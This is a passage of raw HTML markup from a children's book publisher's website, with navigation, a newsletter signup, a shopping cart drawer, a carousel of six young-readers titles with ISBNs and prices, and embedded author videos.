d="M194.58,96.14a3.15,3.15,0,0,1-2.39-1,2.43,2.43,0,0,0,.54-.9,2.35,2.35,0,0,0,1.89,1A1.41,1.41,0,0,0,196.15,94c0-1-.9-1.5-1.67-2-1-.6-1.94-1.09-1.94-2.48s1.34-1.92,2.46-1.92a2.81,2.81,0,0,1,2,.77,2.68,2.68,0,0,0-.52.86,1.89,1.89,0,0,0-1.51-.84c-.8,0-1.34.4-1.34,1.2s.9,1.26,1.53,1.64c1.1.66,2.08,1.16,2.08,2.63A2.44,2.44,0,0,1,194.58,96.14Z"/></svg>
	</a>
	<meta itemprop="publisher" content="Little, Brown Books for Young Readers" />
		</h2>

	<ul class="site-header__social">
		<li class="site-header__social-header">
			<a href="https://www.hachettebookgroup.com/newsletters/">Newsletter</a>
		</li>
		<li class="site-header__social-list-item">
			<a href="/preferences" aria-label="Preferences"><div class="header-button">
<svg xmlns="http://www.w3.org/2000/svg" style="width: 100%; height: 100%;" viewBox="0 0 512 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M495.9 166.6C499.2 175.2 496.4 184.9 489.6 191.2L446.3 230.6C447.4 238.9 448 247.4 448 256C448 264.6 447.4 273.1 446.3 281.4L489.6 320.8C496.4 327.1 499.2 336.8 495.9 345.4C491.5 357.3 486.2 368.8 480.2 379.7L475.5 387.8C468.9 398.8 461.5 409.2 453.4 419.1C447.4 426.2 437.7 428.7 428.9 425.9L373.2 408.1C359.8 418.4 344.1 427 329.2 433.6L316.7 490.7C314.7 499.7 307.7 506.1 298.5 508.5C284.7 510.8 270.5 512 255.1 512C241.5 512 227.3 510.8 213.5 508.5C204.3 506.1 197.3 499.7 195.3 490.7L182.8 433.6C167 427 152.2 418.4 138.8 408.1L83.14 425.9C74.3 428.7 64.55 426.2 58.63 419.1C50.52 409.2 43.12 398.8 36.52 387.8L31.84 379.7C25.77 368.8 20.49 357.3 16.06 345.4C12.82 336.8 15.55 327.1 22.41 320.8L65.67 281.4C64.57 273.1 64 264.6 64 256C64 247.4 64.57 238.9 65.67 230.6L22.41 191.2C15.55 184.9 12.82 175.3 16.06 166.6C20.49 154.7 25.78 143.2 31.84 132.3L36.51 124.2C43.12 113.2 50.52 102.8 58.63 92.95C64.55 85.8 74.3 83.32 83.14 86.14L138.8 103.9C152.2 93.56 167 84.96 182.8 78.43L195.3 21.33C197.3 12.25 204.3 5.04 213.5 3.51C227.3 1.201 241.5 0 256 0C270.5 0 284.7 1.201 298.5 3.51C307.7 5.04 314.7 12.25 316.7 21.33L329.2 78.43C344.1 84.96 359.8 93.56 373.2 103.9L428.9 86.14C437.7 83.32 447.4 85.8 453.4 92.95C461.5 102.8 468.9 113.2 475.5 124.2L480.2 132.3C486.2 143.2 491.5 154.7 495.9 166.6V166.6zM256 336C300.2 336 336 300.2 336 255.1C336 211.8 300.2 175.1 256 175.1C211.8 175.1 176 211.8 176 255.1C176 300.2 211.8 336 256 336z"/></svg>
</div></a>
		</li>
			</ul>
	<div class="mobile-search">
		
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.lbyr.com/">
		<label class="site-search__label" for="search-form-6318b8cda66c4">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-6318b8cda66c4" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-417336042  desc-search-icon-1691514454">
	<title id="title-search-icon-417336042">Search</title>
	<desc id="desc-search-icon-1691514454">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
	</div>
</div>
<div class="site-header__default site-header__nav-search-container">
	<div class="menu-lbyr-container"><nav class="site-header__nav"><ul id="menu-lbyr" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/little-brown-books-for-young-readers/page/about-little-brown-books-for-young-readers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="#" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-1448689873" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1448689873" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1448689873" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1325871000  desc-arrow-3133853382">
	<title id="titlet-arrow-1325871000">Arrow Icon</title>
	<desc id="desc-arrow-3133853382">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1448689873" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1448689873"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="jimmy patterson">jimmy patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li></ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/landing-page/lbyr-blog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blog">Blog</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/little-brown-books-for-young-readers/page/picture-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Picture Books">Picture Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/little-brown-books-for-young-readers/page/middle-grade/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Middle Grade">Middle Grade</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/little-brown-books-for-young-readers/page/young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Young Adult">Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="http://littlebrownlibrary.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="School &amp; Library">School &amp; Library</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Home">HBG Home</a></span></li></ul></nav></div>	
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.lbyr.com/">
		<label class="site-search__label" for="search-form-6318b8cda9c24">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-6318b8cda9c24" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-2540662880  desc-search-icon-1888910972">
	<title id="title-search-icon-2540662880">Search</title>
	<desc id="desc-search-icon-1888910972">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
</div>
</header>

<!-- Popup Modal -->
<div class="modal-popup modal-site-popup modal-imprint-popup modal fade" id="newsletter_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog" role="document">
	<div class="modal-content">
	  <div class="modal-header">
		<button type="button" class="modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		<h4 class="modal-title"></h4>
	  </div>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Bring the (book) party to your inbox with the NOVL enewsletter for YA readers</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Bring the (book) party to your inbox with the NOVL enewsletter for YA readers</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
									<input type="hidden" name="list_id" class="hachette-input" value="01826e81c2" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					SIGN UP				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.lbyr.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.lbyr.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
	</div>
  </div>
</div>

<!-- Cart -->
<section class="drawer" id="flyout-cart" data-drawer-target aria-expanded="false">
	<div class="drawer__overlay" data-drawer-close tabindex="-1"></div>
	<div class="drawer__wrapper">
			<div class="drawer__header">
					<div class="drawer__title"><h2>Shopping Cart</h2></div>
					<button class="drawer__close" data-drawer-close aria-label="Close Cart">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M310.6 361.4c12.5 12.5 12.5 32.75 0 45.25C304.4 412.9 296.2 416 288 416s-16.38-3.125-22.62-9.375L160 301.3L54.63 406.6C48.38 412.9 40.19 416 32 416S15.63 412.9 9.375 406.6c-12.5-12.5-12.5-32.75 0-45.25l105.4-105.4L9.375 150.6c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L160 210.8l105.4-105.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-105.4 105.4L310.6 361.4z"/></svg>
</button>
			</div>
			<div class="drawer__content">
				<div id="shopping-cart-component" class="shopping-cart-component"></div>
			</div>
	</div>
</section>
			<div id="content" class="site__content">
									<div class="landing-page-module module-detailed-titles__0 "
					>
			
<div class="detailed-titles contributor-titles module">
	<div class="module__content">
		<div id="titles-carousel-736646-carousel" class="carousel slide " data-desktop-slide-items="6" data-mobile-slide-items="1" data-desktop-slide-rows="1">
						
			<ol class="carousel-indicators banner__carousel-indicators">
									<li data-target="#titles-carousel-736646-carousel" data-slide-to="0"></li>
									<li data-target="#titles-carousel-736646-carousel" data-slide-to="1"></li>
									<li data-target="#titles-carousel-736646-carousel" data-slide-to="2"></li>
									<li data-target="#titles-carousel-736646-carousel" data-slide-to="3"></li>
									<li data-target="#titles-carousel-736646-carousel" data-slide-to="4"></li>
									<li data-target="#titles-carousel-736646-carousel" data-slide-to="5"></li>
							</ol>

			<div class="carousel-inner" role="listbox">
				
					<div class="item carousel__slide">
						<div class="carousel__slide-content detailed-title-container">
						
															<a href="https://www.lbyr.com/titles/amina-luqman-dawson/freewater/9780316056618/" aria-label="Freewater">
														<img width="190" height="280" src="" class="lazyload orientation-portrait" alt="Freewater" loading="lazy" data-src="https://www.lbyr.com/wp-content/uploads/2022/01/9780316056618-1.jpg?fit=190%2C280" />							</a>
						
						
														<p>by <a href="https://www.lbyr.com/contributor/amina-luqman-dawson/" class="title-header__author"><span>Amina Luqman-Dawson</span></a></p>
													
						
													<p class="detailed-titles__isbn">9780316056618</p>
						
						
													<p class="detailed-titles__price">
									USD: $16.99 / CAD: $22.99							</p>
						
													<a href="https://www.lbyr.com/titles/amina-luqman-dawson/freewater/9780316056618/" aria-label="Freewater">
								<div class="btn btn-default">
									Buy Now								</div>
							</a>
						
													<p>02 / 01 / 2022</p>
											</div>
				</div>

				
					<div class="item carousel__slide">
						<div class="carousel__slide-content detailed-title-container">
						
															<a href="https://www.lbyr.com/titles/alexandria-rogers/the-witch-the-sword-and-the-cursed-knights/9780759554580/" aria-label="The Witch, The Sword, and the Cursed Knights">
														<img width="190" height="276" src="" class="lazyload orientation-portrait" alt="The Witch, The Sword, and the Cursed Knights" loading="lazy" data-src="https://www.lbyr.com/wp-content/uploads/2021/06/9780759554580-1.jpg?fit=190%2C276" />							</a>
						
						
														<p>by <a href="https://www.lbyr.com/contributor/alexandria-rogers/" class="title-header__author"><span>Alexandria Rogers</span></a></p>
													
						
													<p class="detailed-titles__isbn">9780759554580</p>
						
						
													<p class="detailed-titles__price">
									USD: $16.99 / CAD: $22.99							</p>
						
													<a href="https://www.lbyr.com/titles/alexandria-rogers/the-witch-the-sword-and-the-cursed-knights/9780759554580/" aria-label="The Witch, The Sword, and the Cursed Knights">
								<div class="btn btn-default">
									Buy Now								</div>
							</a>
						
													<p>02 / 08 / 2022</p>
											</div>
				</div>

				
					<div class="item carousel__slide">
						<div class="carousel__slide-content detailed-title-container">
						
															<a href="https://www.lbyr.com/titles/kwame-alexander/the-door-of-no-return/9780316441865/" aria-label="The Door of No Return">
														<img width="190" height="278" src="" class="lazyload orientation-portrait" alt="The Door of No Return" loading="lazy" data-src="https://www.lbyr.com/wp-content/uploads/2022/05/9780316441865-1.jpg?fit=190%2C278" />							</a>
						
						
														<p>by <a href="https://www.lbyr.com/contributor/kwame-alexander/" class="title-header__author"><span>Kwame Alexander</span></a></p>
													
						
													<p class="detailed-titles__isbn">9780316441865</p>
						
						
													<p class="detailed-titles__price">
									USD: $17.99 / CAD: $22.99							</p>
						
													<a href="https://www.lbyr.com/titles/kwame-alexander/the-door-of-no-return/9780316441865/" aria-label="The Door of No Return">
								<div class="btn btn-default">
									Buy Now								</div>
							</a>
						
													<p>09 / 27 / 2022</p>
											</div>
				</div>

				
					<div class="item carousel__slide">
						<div class="carousel__slide-content detailed-title-container">
						
															<a href="https://www.lbyr.com/titles/a-j-sass/ellen-outside-the-lines/9780759556270/" aria-label="Ellen Outside the Lines">
														<img width="190" height="276" src="" class="lazyload orientation-portrait" alt="Ellen Outside the Lines" loading="lazy" data-src="https://www.lbyr.com/wp-content/uploads/2021/07/9780759556270-1.jpg?fit=190%2C276" />							</a>
						
						
														<p>by <a href="https://www.lbyr.com/contributor/a-j-sass/" class="title-header__author"><span>A. J. Sass</span></a></p>
													
						
													<p class="detailed-titles__isbn">9780759556270</p>
						
						
													<p class="detailed-titles__price">
									USD: $16.99 / CAD: $22.99							</p>
						
													<a href="https://www.lbyr.com/titles/a-j-sass/ellen-outside-the-lines/9780759556270/" aria-label="Ellen Outside the Lines">
								<div class="btn btn-default">
									Buy Now								</div>
							</a>
						
													<p>03 / 22 / 2022</p>
											</div>
				</div>

				
					<div class="item carousel__slide">
						<div class="carousel__slide-content detailed-title-container">
						
															<a href="https://www.lbyr.com/titles/dinah-johnson/h-is-for-harlem/9780316322379/" aria-label="H Is for Harlem">
														<img width="190" height="227" src="" class="lazyload orientation-portrait" alt="H Is for Harlem" loading="lazy" data-src="https://www.lbyr.com/wp-content/uploads/2022/02/9780316322379-1.jpg?fit=190%2C227" />							</a>
						
						
														<p>by <a href="https://www.lbyr.com/contributor/dinah-johnson/" class="title-header__author"><span>Dinah Johnson</span></a></p>
															<p>Illustrated by <span>April Harrison</span></p>
													
						
													<p class="detailed-titles__isbn">9780316322379</p>
						
						
													<p class="detailed-titles__price">
									USD: $18.99 / CAD: $23.99							</p>
						
													<a href="https://www.lbyr.com/titles/dinah-johnson/h-is-for-harlem/9780316322379/" aria-label="H Is for Harlem">
								<div class="btn btn-default">
									Buy Now								</div>
							</a>
						
													<p>07 / 19 / 2022</p>
											</div>
				</div>

				
					<div class="item carousel__slide">
						<div class="carousel__slide-content detailed-title-container">
						
															<a href="https://www.lbyr.com/titles/matthew-cordell/cornbread-poppy/9780759554863/" aria-label="Cornbread &amp; Poppy">
														<img width="190" height="251" src="" class="lazyload orientation-portrait" alt="Cornbread &amp; Poppy" loading="lazy" data-src="https://www.lbyr.com/wp-content/uploads/2022/01/9780759554863.jpg?fit=190%2C251" />							</a>
						
						
														<p>by <a href="https://www.lbyr.com/contributor/matthew-cordell/" class="title-header__author"><span>Matthew Cordell</span></a></p>
													
						
													<p class="detailed-titles__isbn">9780759554863</p>
						
						
													<p class="detailed-titles__price">
									USD: $6.99 / CAD: $9.99							</p>
						
													<a href="https://www.lbyr.com/titles/matthew-cordell/cornbread-poppy/9780759554863/" aria-label="Cornbread &amp; Poppy">
								<div class="btn btn-default">
									Buy Now								</div>
							</a>
						
													<p>01 / 04 / 2022</p>
											</div>
				</div>

							</div>
			<a class="left carousel-control site-carousel__control--prev" href="#titles-carousel-736646-carousel" role="button" data-slide="prev" aria-label="Previous">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-286869402  desc-arrow-3419099862">
	<title id="titlet-arrow-286869402">Arrow Icon</title>
	<desc id="desc-arrow-3419099862">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
			<a class="right carousel-control site-carousel__control--next" href="#titles-carousel-736646-carousel" role="button" data-slide="next" aria-label="Next">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1610620316  desc-arrow-3963591358">
	<title id="titlet-arrow-1610620316">Arrow Icon</title>
	<desc id="desc-arrow-3963591358">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
		</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-video-feed-embed__1 "
					>
			
<div class="video-feed-embed__video-carousel module__content module--fixed">
	<div id="hachette-video-carousel-1105361098" class="carousel slide" data-desktop-slide-items="3"
		data-mobile-slide-items="1" data-desktop-slide-rows="1" data-ride="false">
		
		<ol class="carousel-indicators">
							<li data-target="#hachette-video-carousel-1105361098"
					data-slide-to="0"></li>
							<li data-target="#hachette-video-carousel-1105361098"
					data-slide-to="1"></li>
							<li data-target="#hachette-video-carousel-1105361098"
					data-slide-to="2"></li>
					</ol>

		<div class="carousel-inner" role="listbox">
			<div class="item carousel__slide">
							<div class="carousel__slide-content">
					<iframe title="Audrey Helen Weber Presents THE WIND AND THE CLOVER" src="https://player.vimeo.com/video/642481822?h=7472427d77&amp;dnt=1&amp;app_id=122963" width="400" height="225" frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen></iframe>				</div>
							<div class="carousel__slide-content">
					<iframe title="Matthew Cordell Presents CORNBREAD &amp;amp; POPPY" src="https://player.vimeo.com/video/642716960?h=cb95b5a649&amp;dnt=1&amp;app_id=122963" width="400" height="225" frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen></iframe>				</div>
							<div class="carousel__slide-content">
					<iframe title="Alexandria Rogers Presents THE WITCH, THE SWORD, AND THE CURSED KNIGHTS" src="https://player.vimeo.com/video/640417860?h=0aadfe197b&amp;dnt=1&amp;app_id=122963" width="400" height="225" frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen></iframe>				</div>
						</div>
		</div>

		<a class="left carousel-control site-carousel__control--prev"
			href="#hachette-video-carousel-1105361098"
			role="button"
			aria-label="Previous"
			data-slide="prev">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-left-arrow-229121183  desc-left-arrow-1849887163">
	<title id="title-left-arrow-229121183">Left Arrow</title>
	<desc id="desc-left-arrow-1849887163">Left arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
		</a>
		<a class="right carousel-control site-carousel__control--next"
		href="#hachette-video-carousel-1105361098"
		role="button"
		aria-label="Next"
		data-slide="next">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-right-arrow-3832717855  desc-right-arrow-2235701388">
	<title id="title-right-arrow-3832717855">Right Arrow</title>
	<desc id="desc-right-arrow-2235701388">Right arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
		</a>
	</div>
</div>
		</div>
						
<footer class="site-footer">
	<div class="site-footer__logo">
		
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-ini-3137697531  desc-hachette-logo-ini-3168372935">
<title id="title-hachette-logo-ini-3137697531">Hachette Logo</title>
<desc id="desc-hachette-logo-ini-3168372935">Large H Initial</desc>
<polygon role="presentation" class="initial-logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
<polygon role="presentation" class="initial-logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
	</div>
			<ul class="site-footer__social">
							<li class="site-footer__social-list-item">
					<a href="https://www.facebook.com/LittleBrownYoungReaders/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Facebook"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-306820958  desc-facebook-icon-2131398721">
	<title id="title-facebook-icon-306820958">Facebook Icon</title>
	<desc id="desc-facebook-icon-2131398721">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://twitter.com/littlebrownyr" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Twitter"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-3192769250  desc-twitter-icon-3191534183">
	<title id="title-twitter-icon-3192769250">Twitter Icon</title>
	<desc id="desc-twitter-icon-3191534183">Twitter Logo</desc>
	<path role="presentation" role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://www.instagram.com/littlebrownyoungreaders/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Instagram"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-3455786062  desc-ig-icon-1648811463">
	<title id="title-ig-icon-3455786062">Instagram Icon</title>
	<desc id="desc-ig-icon-1648811463">Instagram Icon</desc>
	<rect role="presentation" class="cls-1" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" class="cls-1" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
					</a>
				</li>
																	</ul>
		<nav class="site-footer__menus">
		
<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-about" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-about">
			About			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-about">
			<ul id="menu-about" class="menu"><li id="menu-item-647353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-647353"><a href="/landing-page/about-hachette-book-group-2/">About Us</a></li>
<li id="menu-item-478324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478324"><a href="https://www.grandcentralpublishing.com/leadership/">Our Leadership</a></li>
<li id="menu-item-478335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478335"><a href="https://www.hachettebookgroup.com/imprints/">Imprints</a></li>
<li id="menu-item-550778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-550778"><a href="https://www.hachettebookgroup.com/newsletters/">Newsletter Subscription</a></li>
<li id="menu-item-1192194" class="menu-item menu-item-type-post_type menu-item-object-landing-page menu-item-1192194"><a href="https://www.hachettebookgroup.com/landing-page/freedom-of-expression/">Freedom of Expression</a></li>
<li id="menu-item-1204864" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1204864"><a href="/landing-page/social-impact-at-hbg/">Social Impact at HBG</a></li>
<li id="menu-item-478329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478329"><a href="https://www.hachettebookgroup.com/about/hbg-in-the-news/">HBG In the News</a></li>
